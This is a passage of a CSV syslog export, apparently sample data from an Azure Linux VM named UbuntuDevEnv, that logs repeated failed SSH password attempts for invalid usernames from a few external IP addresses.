+11766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:51:39,UbuntuDevEnv,2019-06-26 00:51:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,78308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:51:41,UbuntuDevEnv,2019-06-26 00:51:41,auth,UbuntuDevEnv,info,Failed password for invalid user proxyuser from 131.100.219.3 port 48726 ssh2,78308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,proxyuser,131.100.219.3,48726,,
+11768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:51:41,UbuntuDevEnv,2019-06-26 00:51:41,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 48726:11: Bye Bye [preauth],78308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,48726,,
+11769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:51:41,UbuntuDevEnv,2019-06-26 00:51:41,auth,UbuntuDevEnv,info,Disconnected from invalid user proxyuser 131.100.219.3 port 48726 [preauth],78308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,proxyuser,131.100.219.3,48726,,
+11770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:51:44,UbuntuDevEnv,2019-06-26 00:51:44,auth,UbuntuDevEnv,info,Invalid user jenkins from 186.31.116.78 port 47149,78335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,186.31.116.7,47149,,
+11771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:51:44,UbuntuDevEnv,2019-06-26 00:51:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,78335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:51:44,UbuntuDevEnv,2019-06-26 00:51:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,78335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:51:47,UbuntuDevEnv,2019-06-26 00:51:46,auth,UbuntuDevEnv,info,Failed password for invalid user jenkins from 186.31.116.78 port 47149 ssh2,78335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,186.31.116.7,47149,,
+11774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:51:47,UbuntuDevEnv,2019-06-26 00:51:46,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 47149:11: Bye Bye [preauth],78335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,47149,,
+11775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:51:47,UbuntuDevEnv,2019-06-26 00:51:46,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 186.31.116.78 port 47149 [preauth],78335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,186.31.116.7,47149,,
+11776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:53:42,UbuntuDevEnv,2019-06-26 00:53:41,auth,UbuntuDevEnv,info,Invalid user gzuser from 186.31.116.78 port 55953,78743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gzuser,186.31.116.7,55953,,
+11777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:53:42,UbuntuDevEnv,2019-06-26 00:53:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,78743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:53:42,UbuntuDevEnv,2019-06-26 00:53:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,78743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:53:44,UbuntuDevEnv,2019-06-26 00:53:44,auth,UbuntuDevEnv,info,Failed password for invalid user gzuser from 186.31.116.78 port 55953 ssh2,78743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gzuser,186.31.116.7,55953,,
+11780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:53:44,UbuntuDevEnv,2019-06-26 00:53:44,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 55953:11: Bye Bye [preauth],78743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,55953,,
+11781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:53:44,UbuntuDevEnv,2019-06-26 00:53:44,auth,UbuntuDevEnv,info,Disconnected from invalid user gzuser 186.31.116.78 port 55953 [preauth],78743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gzuser,186.31.116.7,55953,,
+11782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:53:55,UbuntuDevEnv,2019-06-26 00:53:55,auth,UbuntuDevEnv,info,Invalid user tom from 131.100.219.3 port 36894,78792,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tom,131.100.219.3,36894,,
+11783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:53:55,UbuntuDevEnv,2019-06-26 00:53:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,78792,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:53:55,UbuntuDevEnv,2019-06-26 00:53:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,78792,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:53:57,UbuntuDevEnv,2019-06-26 00:53:57,auth,UbuntuDevEnv,info,Failed password for invalid user tom from 131.100.219.3 port 36894 ssh2,78792,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tom,131.100.219.3,36894,,
+11786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:53:58,UbuntuDevEnv,2019-06-26 00:53:57,auth,UbuntuDevEnv,info,Disconnected from invalid user tom 131.100.219.3 port 36894 [preauth],78792,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tom,131.100.219.3,36894,,
+11787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:53:58,UbuntuDevEnv,2019-06-26 00:53:57,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 36894:11: Bye Bye [preauth],78792,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,36894,,
+11788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:55:36,UbuntuDevEnv,2019-06-26 00:55:35,auth,UbuntuDevEnv,info,Invalid user pgsql from 186.31.116.78 port 36519,79149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgsql,186.31.116.7,36519,,
+11789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:55:36,UbuntuDevEnv,2019-06-26 00:55:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,79149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:55:36,UbuntuDevEnv,2019-06-26 00:55:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,79149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:55:37,UbuntuDevEnv,2019-06-26 00:55:37,auth,UbuntuDevEnv,info,Failed password for invalid user pgsql from 186.31.116.78 port 36519 ssh2,79149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgsql,186.31.116.7,36519,,
+11792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:55:37,UbuntuDevEnv,2019-06-26 00:55:37,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 36519:11: Bye Bye [preauth],79149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,36519,,
+11793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:55:37,UbuntuDevEnv,2019-06-26 00:55:37,auth,UbuntuDevEnv,info,Disconnected from invalid user pgsql 186.31.116.78 port 36519 [preauth],79149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgsql,186.31.116.7,36519,,
+11794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:57:28,UbuntuDevEnv,2019-06-26 00:57:27,auth,UbuntuDevEnv,info,Invalid user testftp from 186.31.116.78 port 45321,79547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testftp,186.31.116.7,45321,,
+11795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:57:28,UbuntuDevEnv,2019-06-26 00:57:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,79547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:57:28,UbuntuDevEnv,2019-06-26 00:57:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,79547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:57:30,UbuntuDevEnv,2019-06-26 00:57:30,auth,UbuntuDevEnv,info,Failed password for invalid user testftp from 186.31.116.78 port 45321 ssh2,79547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testftp,186.31.116.7,45321,,
+11798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:57:30,UbuntuDevEnv,2019-06-26 00:57:30,auth,UbuntuDevEnv,info,Disconnected from invalid user testftp 186.31.116.78 port 45321 [preauth],79547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testftp,186.31.116.7,45321,,
+11799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:57:30,UbuntuDevEnv,2019-06-26 00:57:30,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 45321:11: Bye Bye [preauth],79547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,45321,,
+11800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:59:26,UbuntuDevEnv,2019-06-26 00:59:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,79953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:59:26,UbuntuDevEnv,2019-06-26 00:59:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,79953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:59:26,UbuntuDevEnv,2019-06-26 00:59:25,auth,UbuntuDevEnv,info,Invalid user yebni from 186.31.116.78 port 54120,79953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yebni,186.31.116.7,54120,,
+11803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:59:28,UbuntuDevEnv,2019-06-26 00:59:28,auth,UbuntuDevEnv,info,Failed password for invalid user yebni from 186.31.116.78 port 54120 ssh2,79953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yebni,186.31.116.7,54120,,
+11804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:59:28,UbuntuDevEnv,2019-06-26 00:59:28,auth,UbuntuDevEnv,info,Disconnected from invalid user yebni 186.31.116.78 port 54120 [preauth],79953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yebni,186.31.116.7,54120,,
+11805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:59:28,UbuntuDevEnv,2019-06-26 00:59:28,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 54120:11: Bye Bye [preauth],79953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,54120,,
+11806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:00:37,UbuntuDevEnv,2019-06-26 01:00:36,auth,UbuntuDevEnv,info,Received disconnect from 205.185.124.57 port 48964:11: Bye Bye [preauth],80298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,205.185.124.5,48964,,
+11807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:00:37,UbuntuDevEnv,2019-06-26 01:00:36,auth,UbuntuDevEnv,info,Disconnected from 205.185.124.57 port 48964 [preauth],80298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,205.185.124.5,48964,,
+11808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:01:25,UbuntuDevEnv,2019-06-26 01:01:25,auth,UbuntuDevEnv,info,Invalid user ofbiz from 186.31.116.78 port 34688,80465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ofbiz,186.31.116.7,34688,,
+11809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:01:25,UbuntuDevEnv,2019-06-26 01:01:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,80465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:01:25,UbuntuDevEnv,2019-06-26 01:01:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,80465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:01:28,UbuntuDevEnv,2019-06-26 01:01:27,auth,UbuntuDevEnv,info,Failed password for invalid user ofbiz from 186.31.116.78 port 34688 ssh2,80465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ofbiz,186.31.116.7,34688,,
+11812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:01:28,UbuntuDevEnv,2019-06-26 01:01:27,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 34688:11: Bye Bye [preauth],80465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,34688,,
+11813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:01:28,UbuntuDevEnv,2019-06-26 01:01:27,auth,UbuntuDevEnv,info,Disconnected from invalid user ofbiz 186.31.116.78 port 34688 [preauth],80465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ofbiz,186.31.116.7,34688,,
+11814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:03:20,UbuntuDevEnv,2019-06-26 01:03:20,auth,UbuntuDevEnv,info,Invalid user silverline from 186.31.116.78 port 43491,80874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,silverline,186.31.116.7,43491,,
+11815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:03:20,UbuntuDevEnv,2019-06-26 01:03:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,80874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:03:20,UbuntuDevEnv,2019-06-26 01:03:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,80874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:03:22,UbuntuDevEnv,2019-06-26 01:03:22,auth,UbuntuDevEnv,info,Failed password for invalid user silverline from 186.31.116.78 port 43491 ssh2,80874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,silverline,186.31.116.7,43491,,
+11818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:03:22,UbuntuDevEnv,2019-06-26 01:03:22,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 43491:11: Bye Bye [preauth],80874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,43491,,
+11819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:03:22,UbuntuDevEnv,2019-06-26 01:03:22,auth,UbuntuDevEnv,info,Disconnected from invalid user silverline 186.31.116.78 port 43491 [preauth],80874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,silverline,186.31.116.7,43491,,
+11820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:08:39,UbuntuDevEnv,2019-06-26 01:08:39,auth,UbuntuDevEnv,info,Invalid user pp from 131.108.48.151 port 11548,81988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pp,131.108.48.1,11548,,
+11821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:08:39,UbuntuDevEnv,2019-06-26 01:08:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,81988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:08:39,UbuntuDevEnv,2019-06-26 01:08:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,81988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:08:41,UbuntuDevEnv,2019-06-26 01:08:41,auth,UbuntuDevEnv,info,Failed password for invalid user pp from 131.108.48.151 port 11548 ssh2,81988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pp,131.108.48.1,11548,,
+11824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:08:42,UbuntuDevEnv,2019-06-26 01:08:41,auth,UbuntuDevEnv,info,Disconnected from invalid user pp 131.108.48.151 port 11548 [preauth],81988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pp,131.108.48.1,11548,,
+11825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:08:42,UbuntuDevEnv,2019-06-26 01:08:41,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 11548:11: Bye Bye [preauth],81988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,11548,,
